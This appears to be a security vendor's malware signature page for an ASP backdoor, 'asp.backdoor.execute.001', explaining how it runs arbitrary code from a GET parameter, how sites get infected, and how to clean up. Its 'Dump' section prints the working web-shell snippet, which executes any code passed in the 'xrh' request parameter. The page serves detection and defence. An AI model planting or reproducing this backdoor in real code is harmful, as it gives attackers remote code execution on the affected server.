Malware Signatures

  1. Home
  2. Malware Signatures
  3. asp.backdoor.execute.001

asp.backdoor.execute.001

This malware category is related to server-side malicious scripts which are commonly used as backdoors. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is ASP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.
This backdoor type uses the execute function to run the malicious payload, which can be any ASP code provided in the URL passed as a variable (GET request).

Affecting

Any ASP based website, often through vulnerable code or compromised FTP credentials.

Cleanup

Cleanup is done by deleting the malicious file or, if injected on a valid file, removing the code from the host. This malware can be found in your system by searching for execute ASP command and evaluating the algorithm (valid programs can use this command, be careful).

Dump

<% If Request("xrh")<>"" Then
   E=request("xrh")
   execute E
   end if
%>